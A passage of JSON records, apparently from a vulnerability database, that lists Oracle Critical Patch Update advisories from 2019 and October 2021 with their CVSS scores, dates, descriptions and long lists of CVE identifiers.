"CVE-2019-2839", "CVE-2019-2484", "CVE-2019-2842", "CVE-2019-2793", "CVE-2019-12086", "CVE-2018-1000120", "CVE-2019-2867", "CVE-2019-2824", "CVE-2018-0732", "CVE-2019-2740", "CVE-2019-2818", "CVE-2016-7103", "CVE-2019-2743", "CVE-2018-11055", "CVE-2018-1000180", "CVE-2019-2672", "CVE-2018-1304", "CVE-2019-2855", "CVE-2018-17960", "CVE-2019-2795", "CVE-2019-2798", "CVE-2019-11358", "CVE-2019-2788", "CVE-2019-2825", "CVE-2019-0217", "CVE-2019-2802", "CVE-2019-2814", "CVE-2019-2811", "CVE-2015-0227", "CVE-2019-2878", "CVE-2019-2807", "CVE-2019-2784", "CVE-2018-1275", "CVE-2019-2856", "CVE-2019-2879", "CVE-2018-7489", "CVE-2018-19361", "CVE-2016-6306", "CVE-2019-2838", "CVE-2019-2770", "CVE-2019-2785", "CVE-2019-2762", "CVE-2016-2183", "CVE-2019-2799", "CVE-2018-0734", "CVE-2019-2817", "CVE-2018-5407", "CVE-2019-0190", "CVE-2019-2736", "CVE-2016-9878", "CVE-2017-3735", "CVE-2019-2781", "CVE-2019-7317", "CVE-2018-15756", "CVE-2018-1271", "CVE-2018-14719", "CVE-2016-3473", "CVE-2019-2599", "CVE-2019-3823", "CVE-2019-6129", "CVE-2019-2764", "CVE-2018-1000121", "CVE-2019-2808", "CVE-2019-2833", "CVE-2019-2749", "CVE-2018-11039", "CVE-2019-2731", "CVE-2019-2758", "CVE-2019-2845", "CVE-2019-2816", "CVE-2019-2761", "CVE-2019-2850", "CVE-2019-2830", "CVE-2019-2847", "CVE-2018-11307", "CVE-2019-0192", "CVE-2019-0211", "CVE-2018-14720", "CVE-2019-2805", "CVE-2019-2854", "CVE-2019-2782", "CVE-2019-2810", "CVE-2018-18311", "CVE-2019-2748", "CVE-2019-2754", "CVE-2019-2778", "CVE-2019-2852", "CVE-2019-2826", "CVE-2019-2862", "CVE-2019-2789", "CVE-2019-2759", "CVE-2016-0701", "CVE-2019-0232", "CVE-2017-3737", "CVE-2019-2732", "CVE-2019-2745", "CVE-2019-12814", "CVE-2019-2860", "CVE-2019-2737", "CVE-2019-2777", "CVE-2018-12022", "CVE-2019-2877", "CVE-2016-1182", "CVE-2018-1258", "CVE-2019-2837", "CVE-2019-0199", "CVE-2019-2841", "CVE-2019-2776", "CVE-2018-1000122", "CVE-2019-2730", "CVE-2018-1305", "CVE-2019-2666", "CVE-2019-2763", "CVE-2019-2846", "CVE-2019-2790", "CVE-2019-2848", "CVE-2018-11057", "CVE-2015-0226", "CVE-2018-16890", "CVE-2019-1543", "CVE-2016-8610", "CVE-2019-2733", "CVE-2019-2752", "CVE-2018-1000873", "CVE-2018-11056", "CVE-2018-11775", "CVE-2018-0735", "CVE-2017-5647", "CVE-2019-2829", "CVE-2019-2751", "CVE-2018-1257", "CVE-2017-5715", "CVE-2019-2738", "CVE-2018-14721", "CVE-2019-2803", "CVE-2019-2767", "CVE-2019-2775", "CVE-2019-2727", "CVE-2016-6497", "CVE-2019-2668", "CVE-2018-3111", "CVE-2014-0114", "CVE-2019-2823", "CVE-2018-3315", "CVE-2019-0215", "CVE-2019-2821", "CVE-2019-5597", "CVE-2018-0739", "CVE-2019-2771", "CVE-2019-2843", "CVE-2019-2861", "CVE-2018-8034", "CVE-2018-15769", "CVE-2019-2757", "CVE-2019-2831", "CVE-2019-2865", "CVE-2019-2815", "CVE-2019-2796", "CVE-2018-1000613", "CVE-2016-9572", "CVE-2019-0197", "CVE-2019-2747", "CVE-2019-2739", "CVE-2019-2797", "CVE-2018-8013", "CVE-2019-2866", "CVE-2019-2769", "CVE-2019-0196", "CVE-2018-1272", "CVE-2019-2741", "CVE-2017-7525", "CVE-2019-2840", "CVE-2019-2835", "CVE-2019-2783", "CVE-2017-3164", "CVE-2018-1270", "CVE-2019-2809", "CVE-2019-2728", "CVE-2017-5664", "CVE-2019-2772", "CVE-2019-2791", "CVE-2016-5007", "CVE-2019-2875", "CVE-2019-2760", "CVE-2018-19360", "CVE-2018-0733", "CVE-2018-17199", "CVE-2016-1181", "CVE-2019-2792", "CVE-2019-2774", "CVE-2019-2812", "CVE-2016-8735", "CVE-2019-2836", "CVE-2018-17189", "CVE-2019-2859", "CVE-2017-14735", "CVE-2017-3738", "CVE-2019-2750", "CVE-2019-0222", "CVE-2019-2779", "CVE-2019-2766", "CVE-2019-2804", "CVE-2019-2871", "CVE-2018-11058", "CVE-2019-2744", "CVE-2019-2725", "CVE-2019-2746", "CVE-2019-2868", "CVE-2019-1559", "CVE-2018-3316", "CVE-2018-17197", "CVE-2018-11784", "CVE-2017-5645", "CVE-2019-2800", "CVE-2019-3822", "CVE-2019-2569", "CVE-2019-2870", "CVE-2019-2873", "CVE-2019-2827", "CVE-2019-2735", "CVE-2017-3736", "CVE-2019-2813", "CVE-2019-2864", "CVE-2019-2828", "CVE-2019-2869", "CVE-2019-2780", "CVE-2019-2834", "CVE-2018-0737", "CVE-2019-2742", "CVE-2019-2844", "CVE-2019-2786", "CVE-2019-2876", "CVE-2019-2822", "CVE-2018-2883", "CVE-2019-2819", "CVE-2017-15095", "CVE-2018-11040", "CVE-2019-2561", "CVE-2019-2858", "CVE-2019-2755", "CVE-2018-11054", "CVE-2019-2801", "CVE-2016-6814", "CVE-2018-9861", "CVE-2019-2857", "CVE-2016-1000031", "CVE-2018-1000301", "CVE-2019-2874", "CVE-2019-2753", "CVE-2019-2756", "CVE-2018-12023", "CVE-2019-2787", "CVE-2018-8039", "CVE-2019-2773", "CVE-2019-2729", "CVE-2019-2863", "CVE-2019-2832"], "modified": "2020-10-12T00:00:00", "id": "ORACLE:CPUJUL2019", "href": "https://www.oracle.com/security-alerts/cpujul2019.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:22", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 284 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at January 2019 Critical Patch Update: Executive Summary and Analysis.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-01-15T00:00:00", "title": "Oracle Critical Patch Update Advisory - January 2019", "type": "oracle", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2520", "CVE-2019-2509", "CVE-2015-9251", "CVE-2019-2451", "CVE-2017-9798", "CVE-2019-2488", "CVE-2019-2395", "CVE-2019-2470", "CVE-2015-8965", "CVE-2018-1000120", "CVE-2018-0732", "CVE-2019-2444", "CVE-2018-1000180", "CVE-2019-2427", "CVE-2019-2501", "CVE-2019-2400", "CVE-2019-2529", "CVE-2019-2412", "CVE-2019-2525", "CVE-2019-2532", "CVE-2018-3311", "CVE-2019-2512", "CVE-2019-2471", "CVE-2019-2521", "CVE-2018-9206", "CVE-2019-2419", "CVE-2018-1275", "CVE-2019-2496", "CVE-2018-7489", "CVE-2019-2416", "CVE-2019-2474", "CVE-2019-2494", "CVE-2018-0734", "CVE-2019-2460", "CVE-2019-2531", "CVE-2018-5407", "CVE-2019-2437", "CVE-2017-3735", "CVE-2017-7658", "CVE-2019-2489", "CVE-2019-2448", "CVE-2019-2439", "CVE-2018-1271", "CVE-2019-2490", "CVE-2019-2447", "CVE-2018-14719", "CVE-2019-2547", "CVE-2019-2553", "CVE-2018-3246", "CVE-2019-2528", "CVE-2018-1000121", "CVE-2019-2423", "CVE-2019-2549", "CVE-2018-11039", "CVE-2019-2434", "CVE-2019-2541", "CVE-2019-2410", "CVE-2019-2449", "CVE-2018-11307", "CVE-2019-2543", "CVE-2019-2425", "CVE-2019-2544", "CVE-2018-3304", "CVE-2018-14720", "CVE-2015-1832", "CVE-2019-2445", "CVE-2018-10933", "CVE-2019-2506", "CVE-2016-0635", "CVE-2019-2466", "CVE-2019-2438", "CVE-2019-2546", "CVE-2019-2407", "CVE-2019-2417", "CVE-2019-2511", "CVE-2019-2486", "CVE-2018-14718", "CVE-2019-2482", "CVE-2019-2402", "CVE-2019-2406", "CVE-2018-12022", "CVE-2019-2456", "CVE-2016-1182", "CVE-2018-1258", "CVE-2019-2530", "CVE-2015-0852", "CVE-2019-2396", "CVE-2019-2554", "CVE-2018-1000122", "CVE-2019-2465", "CVE-2019-2415", "CVE-2018-3303", "CVE-2019-2472", "CVE-2019-2399", "CVE-2019-2519", "CVE-2019-2497", "CVE-2019-2452", "CVE-2017-9526", "CVE-2019-2513", "CVE-2019-2414", "CVE-2019-2420", "CVE-2018-11776", "CVE-2018-3646", "CVE-2018-11775", "CVE-2018-0735", "CVE-2019-2493", "CVE-2019-2527", "CVE-2019-2479", "CVE-2018-1257", "CVE-2019-2473", "CVE-2019-2536", "CVE-2019-2461", "CVE-2018-14721", "CVE-2019-2552", "CVE-2018-1000300", "CVE-2019-2537", "CVE-2019-2504", "CVE-2019-2477", "CVE-2018-11212", "CVE-2019-2397", "CVE-2014-0114", "CVE-2019-2523", "CVE-2019-2443", "CVE-2019-2421", "CVE-2019-2485", "CVE-2019-2442", "CVE-2019-2401", "CVE-2018-0739", "CVE-2019-2539", "CVE-2019-2426", "CVE-2019-2462", "CVE-2019-2436", "CVE-2019-2534", "CVE-2019-2491", "CVE-2019-2510", "CVE-2019-2411", "CVE-2019-2502", "CVE-2018-1313", "CVE-2018-1000613", "CVE-2019-2535", "CVE-2018-8013", "CVE-2019-2432", "CVE-2019-2487", "CVE-2016-9583", "CVE-2019-2463", "CVE-2019-2469", "CVE-2018-1272", "CVE-2017-7525", "CVE-2019-2545", "CVE-2019-2538", "CVE-2019-2500", "CVE-2019-2398", "CVE-2019-2453", "CVE-2018-3147", "CVE-2019-2498", "CVE-2018-1270", "CVE-2017-13745", "CVE-2019-2555", "CVE-2019-2413", "CVE-2016-9389", "CVE-2018-11763", "CVE-2019-2476", "CVE-2018-0733", "CVE-2019-2404", "CVE-2016-5684", "CVE-2016-1181", "CVE-2017-14735", "CVE-2017-3738", "CVE-2019-2548", "CVE-2019-2507", "CVE-2019-2409", "CVE-2019-2533", "CVE-2018-1000632", "CVE-2019-2503", "CVE-2019-2464", "CVE-2019-2435", "CVE-2018-3309", "CVE-2016-9392", "CVE-2019-2522", "CVE-2018-11784", "CVE-2019-2431", "CVE-2017-5645", "CVE-2019-2405", "CVE-2019-2450", "CVE-2019-2478", "CVE-2019-2429", "CVE-2019-2540", "CVE-2019-2467", "CVE-2018-6922", "CVE-2018-5390", "CVE-2015-7940", "CVE-2016-4000", "CVE-2017-3736", "CVE-2019-2524", "CVE-2019-2556", "CVE-2017-0379", "CVE-2019-2495", "CVE-2019-2480", "CVE-2019-2418", "CVE-2018-0737", "CVE-2019-2433", "CVE-2019-2468", "CVE-2019-2457", "CVE-2019-2526", "CVE-2019-2440", "CVE-2017-15095", "CVE-2018-11040", "CVE-2019-2508", "CVE-2019-2422", "CVE-2019-2550", "CVE-2018-3125", "CVE-2016-6814", "CVE-2017-14229", "CVE-2019-2459", "CVE-2016-1000031", "CVE-2019-2481", "CVE-2018-3639", "CVE-2019-2408", "CVE-2019-2446", "CVE-2018-1000301", "CVE-2018-12023", "CVE-2018-3305", "CVE-2015-4760", "CVE-2019-2458", "CVE-2019-2505", "CVE-2019-2430", "CVE-2019-2492", "CVE-2019-2441", "CVE-2019-2403", "CVE-2019-2475", "CVE-2019-2499", "CVE-2019-2455"], "modified": "2020-02-13T00:00:00", "id": "ORACLE:CPUJAN2019", "href": "https://www.oracle.com/security-alerts/cpujan2019.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T15:44:21", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 297 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2019 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2494878.1>).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-04-16T00:00:00", "title": " Oracle Critical Patch Update Advisory - April 2019", "type": "oracle", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2663", "CVE-2019-2688", "CVE-2019-2679", "CVE-2018-19362", "CVE-2017-5533", "CVE-2018-11218", "CVE-2015-9251", "CVE-2019-2634", "CVE-2019-2592", "CVE-2019-2606", "CVE-2019-2677", "CVE-2019-2655", "CVE-2019-2678", "CVE-2019-2617", "CVE-2017-9798", "CVE-2019-2582", "CVE-2019-2618", "CVE-2019-2685", "CVE-2018-3693", "CVE-2018-0732", "CVE-2016-7103", "CVE-2019-2683", "CVE-2017-5753", "CVE-2019-2612", "CVE-2017-5754", "CVE-2018-1000180", "CVE-2019-2726", "CVE-2014-7923", "CVE-2018-1304", "CVE-2019-2616", "CVE-2017-8287", "CVE-2019-2704", "CVE-2019-2565", "CVE-2019-2587", "CVE-2019-2639", "CVE-2019-2703", "CVE-2018-1000004", "CVE-2019-2647", "CVE-2019-2574", "CVE-2019-2706", "CVE-2019-2598", "CVE-2019-2614", "CVE-2018-2880", "CVE-2018-7566", "CVE-2018-12384", "CVE-2015-5922", "CVE-2018-7489", "CVE-2018-19361", "CVE-2019-2689", "CVE-2019-2596", "CVE-2017-15265", "CVE-2018-0734", "CVE-2019-2700", "CVE-2019-2695", "CVE-2019-2624", "CVE-2019-2651", "CVE-2017-7867", "CVE-2019-2611", "CVE-2018-5407", "CVE-2019-0190", "CVE-2018-0495", "CVE-2019-2595", "CVE-2019-2681", "CVE-2017-3735", "CVE-2019-2603", "CVE-2019-2660", "CVE-2019-2580", "CVE-2018-15756", "CVE-2018-14719", "CVE-2019-3823", "CVE-2017-0861", "CVE-2019-2697", "CVE-2019-2517", "CVE-2019-2662", "CVE-2016-3092", "CVE-2019-2709", "CVE-2018-11039", "CVE-2018-11761", "CVE-2018-12539", "CVE-2019-2579", "CVE-2018-11307", "CVE-2019-2566", "CVE-2019-2576", "CVE-2019-2551", "CVE-2014-7940", "CVE-2018-14720", "CVE-2018-16865", "CVE-2019-2571", "CVE-2019-2664", "CVE-2015-1832", "CVE-2016-0635", "CVE-2019-2558", "CVE-2019-2686", "CVE-2018-3120", "CVE-2018-14718", "CVE-2019-2602", "CVE-2019-2722", "CVE-2019-2573", "CVE-2016-7055", "CVE-2019-2605", "CVE-2018-16864", "CVE-2018-10901", "CVE-2014-9515", "CVE-2019-2633", "CVE-2015-3253", "CVE-2017-3731", "CVE-2014-9654", "CVE-2019-2583", "CVE-2019-2601", "CVE-2019-2673", "CVE-2019-2650", "CVE-2019-2687", "CVE-2018-12022", "CVE-2019-2682", "CVE-2018-20685", "CVE-2016-1182", "CVE-2018-1258", "CVE-2019-2621", "CVE-2019-2640", "CVE-2019-2642", "CVE-2019-2567", "CVE-2018-1305", "CVE-2017-17484", "CVE-2019-2713", "CVE-2018-11219", "CVE-2019-2645", "CVE-2018-16890", "CVE-2018-12404", "CVE-2019-2623", "CVE-2019-2701", "CVE-2018-3646", "CVE-2018-11237", "CVE-2018-11775", "CVE-2019-2572", "CVE-2019-2720", "CVE-2018-0735", "CVE-2019-2692", "CVE-2019-2581", "CVE-2019-2589", "CVE-2018-6485", "CVE-2018-1257", "CVE-2019-2691", "CVE-2014-8147", "CVE-2019-2698", "CVE-2019-2712", "CVE-2017-8105", "CVE-2019-2646", "CVE-2018-14721", "CVE-2018-8088", "CVE-2019-3772", "CVE-2019-2694", "CVE-2018-3314", "CVE-2019-2619", "CVE-2014-0114", "CVE-2019-2630", "CVE-2017-3732", "CVE-2019-2613", "CVE-2019-2629", "CVE-2018-0739", "CVE-2019-2670", "CVE-2019-2636", "CVE-2019-2564", "CVE-2019-2693", "CVE-2019-2609", "CVE-2019-2577", "CVE-2018-8034", "CVE-2019-2631", "CVE-2019-2649", "CVE-2019-2578", "CVE-2019-2684", "CVE-2019-2699", "CVE-2019-2656", "CVE-2019-2653", "CVE-2019-2591", "CVE-2018-1000613", "CVE-2014-9911", "CVE-2019-2570", "CVE-2018-8013", "CVE-2016-7415", "CVE-2019-2648", "CVE-2019-2707", "CVE-2018-3620", "CVE-2019-2632", "CVE-2019-2628", "CVE-2018-0161", "CVE-2019-2641", "CVE-2018-11236", "CVE-2014-8146", "CVE-2017-7525", "CVE-2019-2723", "CVE-2019-2635", "CVE-2018-3123", "CVE-2019-2615", "CVE-2019-2638", "CVE-2019-2597", "CVE-2016-6293", "CVE-2018-3312", "CVE-2014-7926", "CVE-2019-2676", "CVE-2017-3733", "CVE-2017-5664", "CVE-2019-2696", "CVE-2018-19360", "CVE-2018-11763", "CVE-2018-0733", "CVE-2019-2654", "CVE-2019-2643", "CVE-2019-2644", "CVE-2018-17199", "CVE-2016-1181", "CVE-2019-2627", "CVE-2019-2708", "CVE-2019-2665", "CVE-2019-2658", "CVE-2016-8735", "CVE-2019-2424", "CVE-2018-17189", "CVE-2019-2516", "CVE-2017-3738", "CVE-2019-2607", "CVE-2019-2671", "CVE-2019-2705", "CVE-2019-2721", "CVE-2019-2588", "CVE-2019-2675", "CVE-2019-1559", "CVE-2019-2604", "CVE-2017-7868", "CVE-2019-2594", "CVE-2019-2669", "CVE-2018-11784", "CVE-2017-5645", "CVE-2019-2586", "CVE-2019-2661", "CVE-2019-2657", "CVE-2017-12617", "CVE-2019-3822", "CVE-2019-2620", "CVE-2019-2593", "CVE-2019-2568", "CVE-2019-2690", "CVE-2019-2610", "CVE-2016-4000", "CVE-2017-3736", "CVE-2019-2702", "CVE-2019-2622", "CVE-2019-2626", "CVE-2019-2637", "CVE-2019-2518", "CVE-2018-0737", "CVE-2017-14952", "CVE-2014-0107", "CVE-2019-2674", "CVE-2019-2575", "CVE-2019-2652", "CVE-2019-2584", "CVE-2016-2141", "CVE-2019-2557", "CVE-2019-2719", "CVE-2019-2680", "CVE-2018-11040", "CVE-2017-3730", "CVE-2019-2659", "CVE-2019-2585", "CVE-2019-2625", "CVE-2016-1000031", "CVE-2019-2590", "CVE-2018-12023", "CVE-2018-1656", "CVE-2019-2600", "CVE-2019-2608"], "modified": "2019-05-28T00:00:00", "id": "ORACLE:CPUAPR2019", "href": "https://www.oracle.com/security-alerts/cpuapr2019.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T11:29:27", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 419 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2809080.1>).\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3522", "CVE-2021-35577", "CVE-2020-26217", "CVE-2021-35537", "CVE-2021-35595", "CVE-2021-22222", "CVE-2021-35628", "CVE-2021-26272", "CVE-2021-36090", "CVE-2021-35642", "CVE-2020-12723", "CVE-2021-2484", "CVE-2021-30369", "CVE-2016-6796", "CVE-2021-2481", "CVE-2021-25122", "CVE-2020-11112", "CVE-2021-35649", "CVE-2021-35620", "CVE-2020-28928", "CVE-2020-26116", "CVE-2021-35553", "CVE-2020-11023", "CVE-2021-35616", "CVE-2021-28163", "CVE-2021-35625", "CVE-2021-35594", "CVE-2021-35643", "CVE-2020-9484", "CVE-2021-2478", "CVE-2021-35618", "CVE-2021-3518", "CVE-2021-35586", "CVE-2021-35651", "CVE-2021-35604", "CVE-2019-11358", "CVE-2021-35536", "CVE-2021-22884", "CVE-2021-35580", "CVE-2020-36184", "CVE-2021-39134", "CVE-2021-31618", "CVE-2021-27807", "CVE-2021-35538", "CVE-2021-35656", "CVE-2021-3177", "CVE-2021-35636", "CVE-2018-1275", "CVE-2021-35645", "CVE-2021-35612", "CVE-2018-14550", "CVE-2019-17195", "CVE-2021-26691", "CVE-2021-35561", "CVE-2021-35666", "CVE-2021-21341", "CVE-2021-35641", "CVE-2021-35634", "CVE-2020-13950", "CVE-2020-11022", "CVE-2021-35609", "CVE-2016-2183", "CVE-2021-35543", "CVE-2021-20227", "CVE-2021-35633", "CVE-2021-22923", "CVE-2019-5427", "CVE-2019-20388", "CVE-2020-10683", "CVE-2021-35539", "CVE-2019-3740", "CVE-2021-37701", "CVE-2021-35650", "CVE-2021-3517", "CVE-2017-9841", "CVE-2021-35569", "CVE-2021-35637", "CVE-2021-3449", "CVE-2021-35657", "CVE-2021-22931", "CVE-2021-3712", "CVE-2020-35728", "CVE-2018-20034", "CVE-2019-3738", "CVE-2021-2476", "CVE-2021-2483", "CVE-2021-2480", "CVE-2020-10672", "CVE-2021-35646", "CVE-2021-35575", "CVE-2019-7317", "CVE-2021-27365", "CVE-2018-15756", "CVE-2020-11994", "CVE-2021-26117", "CVE-2018-1271", "CVE-2021-35552", "CVE-2021-35516", "CVE-2021-35566", "CVE-2020-5413", "CVE-2021-22939", "CVE-2020-36182", "CVE-2021-35585", "CVE-2019-17566", "CVE-2021-22947", "CVE-2018-11039", "CVE-2021-35635", "CVE-2021-35550", "CVE-2021-2388", "CVE-2021-29425", "CVE-2020-13954", "CVE-2019-10086", "CVE-2021-35568", "CVE-2021-35638", "CVE-2021-37712", "CVE-2021-35597", "CVE-2021-22945", "CVE-2020-15824", "CVE-2021-21349", "CVE-2021-27364", "CVE-2020-27824", "CVE-2020-36181", "CVE-2018-20032", "CVE-2021-2137", "CVE-2021-22925", "CVE-2021-3520", "CVE-2021-36222", "CVE-2021-35601", "CVE-2021-3156", "CVE-2021-21348", "CVE-2021-33560", "CVE-2021-35665", "CVE-2018-8032", "CVE-2021-35583", "CVE-2020-28052", "CVE-2019-13990", "CVE-2021-21350", "CVE-2021-35542", "CVE-2021-35662", "CVE-2021-32804", "CVE-2019-17567", "CVE-2021-23336", "CVE-2021-2482", "CVE-2021-21342", "CVE-2020-17530", "CVE-2021-35517", "CVE-2019-3739", "CVE-2020-36186", "CVE-2020-1968", "CVE-2020-10543", "CVE-2021-35598", "CVE-2020-7069", "CVE-2021-35565", "CVE-2021-35564", "CVE-2021-21344", "CVE-2016-0762", "CVE-2021-35626", "CVE-2018-1258", "CVE-2021-32809", "CVE-2021-3450", "CVE-2021-2485", "CVE-2020-13947", "CVE-2021-23840", "CVE-2021-35661", "CVE-2021-2416", "CVE-2020-14061", "CVE-2019-10082", "CVE-2020-10673", "CVE-2019-0233", "CVE-2020-5258", "CVE-2021-26271", "CVE-2021-35554", "CVE-2021-35617", "CVE-2020-27216", "CVE-2019-12400", "CVE-2020-11998", "CVE-2021-35589", "CVE-2021-2479", "CVE-2019-16775", "CVE-2021-2477", "CVE-2020-26137", "CVE-2021-2341", "CVE-2021-28363", "CVE-2021-35558", "CVE-2019-0230", "CVE-2021-35563", "CVE-2021-37713", "CVE-2020-11979", "CVE-2021-23839", "CVE-2021-30641", "CVE-2021-35607", "CVE-2021-35659", "CVE-2018-1257", "CVE-2020-17521", "CVE-2018-20031", "CVE-2021-2461", "CVE-2018-8088", "CVE-2021-36373", "CVE-2021-35043", "CVE-2021-21409", "CVE-2021-33503", "CVE-2021-35627", "CVE-2021-35571", "CVE-2021-35573", "CVE-2020-1945", "CVE-2020-9548", "CVE-2021-35599", "CVE-2021-2471", "CVE-2021-35647", "CVE-2020-7071", "CVE-2021-32808", "CVE-2021-3426", "CVE-2021-35578", "CVE-2021-35606", "CVE-2020-36185", "CVE-2020-1971", "CVE-2021-35610", "CVE-2020-25649", "CVE-2021-3537", "CVE-2021-21346", "CVE-2021-31812", "CVE-2020-11988", "CVE-2021-22118", "CVE-2021-35545", "CVE-2020-11987", "CVE-2021-21345", "CVE-2021-35655", "CVE-2020-8622", "CVE-2020-35490", "CVE-2021-35622", "CVE-2021-28164", "CVE-2021-3711", "CVE-2020-36188", "CVE-2020-36180", "CVE-2021-35551", "CVE-2021-35623", "CVE-2018-1272", "CVE-2021-28957", "CVE-2021-35588", "CVE-2019-0228", "CVE-2021-35602", "CVE-2020-7595", "CVE-2020-9488", "CVE-2021-35567", "CVE-2021-35611", "CVE-2021-35621", "CVE-2020-11113", "CVE-2020-7226", "CVE-2021-35658", "CVE-2021-35592", "CVE-2021-22940", "CVE-2016-5018", "CVE-2021-30468", "CVE-2021-29921", "CVE-2020-8203", "CVE-2021-35570", "CVE-2021-2332", "CVE-2020-24616", "CVE-2020-5397", "CVE-2018-1270", "CVE-2021-35624", "CVE-2021-21351", "CVE-2020-35452", "CVE-2021-35619", "CVE-2021-35644", "CVE-2020-36187", "CVE-2021-22946", "CVE-2021-30640", "CVE-2021-20265", "CVE-2021-35613", "CVE-2021-28169", "CVE-2021-22207", "CVE-2020-24750", "CVE-2020-8277", "CVE-2021-35590", "CVE-2020-35491", "CVE-2021-22924", "CVE-2021-23841", "CVE-2021-21783", "CVE-2021-2475", "CVE-2021-35515", "CVE-2020-27218", "CVE-2021-28165", "CVE-2021-28657", "CVE-2021-33037", "CVE-2021-35574", "CVE-2021-35648", 